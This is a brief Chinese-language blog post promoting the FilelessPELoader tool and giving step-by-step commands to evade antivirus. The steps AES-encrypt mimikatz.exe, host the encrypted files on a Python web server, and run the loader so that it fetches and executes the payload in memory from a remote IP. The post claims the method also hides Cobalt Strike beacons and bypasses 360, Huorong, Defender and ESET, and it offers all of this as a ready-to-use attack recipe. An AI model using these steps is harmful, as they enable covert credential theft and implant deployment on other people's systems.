FilelessPELoader 免杀加载
分享一个好用的 PE 远程加载项目
https://github.com/TheD1rkMtr/FilelessPELoader
远程内存加载,免杀大部分的杀软
1、首先安装相关 python 库
pip install pycryptodome
2、使用 aes.py 生成两个 bin 文件,分别为 cipher.bin
和 key.bin
python aes.py mimikatz.exe
3、使用 python 开启 web 服务,
python -m http.server 80
python -m SimpleHTTPServer 8080
4、使用编译好的程序进行远程加载
FilelessPELoader.exe 192.168.159.3 80 cipher.bin key.bin
[+] Usage: FilelessPELoader.exe <Host> <Port> <Cipher> <Key>
同样可以免杀 cs 上线,测试可以免杀 360、火绒、def、eset
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容